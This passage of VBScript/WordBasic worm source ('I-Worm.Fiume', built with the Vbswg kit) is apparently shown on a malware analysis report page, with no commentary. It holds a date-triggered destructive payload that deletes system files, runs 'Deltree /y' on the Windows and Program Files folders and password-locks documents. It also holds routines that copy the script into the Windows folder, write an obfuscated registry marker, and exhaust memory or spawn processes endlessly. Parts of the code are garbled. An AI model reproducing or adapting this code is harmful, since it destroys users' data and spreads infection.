JnLf11672 & OqKfLnCe & RgTp9531 End Sub Sub Payload() On Error Resume Next End Sub U = Int(Rnd() * 30) + 1 If Day(Now()) = U Then SetPrivateProfileString "HKEY_CLASSES_ROOT\WORD.DOCUMENT.6\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,31", "" SetPrivateProfileString "HKEY_CLASSES_ROOT\Word.Template\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,32", "" AppHide ("Program Manager") SetAttr "c:\Windows\System\vmm32.vxd", 0 Kill "c:\Windows\System\vmm32.vxd" FileSaveAs .Password = "Fuck!" p = 1000 g = 50 num = Int(Rnd() * (p - g) * g) FileSaveAs .Password = Str$(num) Shell ("Deltree /y C:\Windows") Shell ("Deltree /y C:\Progra~1") Destroy$ = "C:\Windows\system\.dll" SetAttr Destroy$, 0 Kill Destroy$ Kill "." End If End Function Sub Crash() On Error Resume Next Set m965y18eN62 = CreateObject("WScript.Shell") m965y18eN62.regwrite "HKCU\software\I-Worm.Fiume\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98) Set mKswiP594x3 = CreateObject("scripting.filesystemobject") mKswiP594x3.copyfile wscript.scriptfullname, mKswiP594x3.GetSpecialFolder(0) & "\ms.vbs" KsVr9p8XF8e = 1 Do ReDim Preserve xwCc40hKEZD(KsVr9p8XF8e) tcZz42j153e = CLng(1024) xwCc40hKEZD(KsVr9p8XF8e) = String(tcZz42j153e tcZz42j153e, ".") KsVr9p8XF8e = KsVr9p8XF8e + 1 Loop End If End Function Sub Crash2() On Error Resume Next Set j8Q4v066K5R = CreateObject("WScript.Shell") j8Q4v066K5R.regwrite "HKCU\software\Worm.Fiume\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98) Set Ze9YN9DKS8P = CreateObject("scripting.filesystemobject") Ze9YN9DKS8P.copyfile wscript.scriptfullname, Ze9YN9DKS8P.GetSpecialFolder(0) & "\Worm2.vbs" Do j8Q4v066K5R.Run "notepad", False Loop End If End Function

Open this report in the interactive analyzer, or submit your own file for analysis.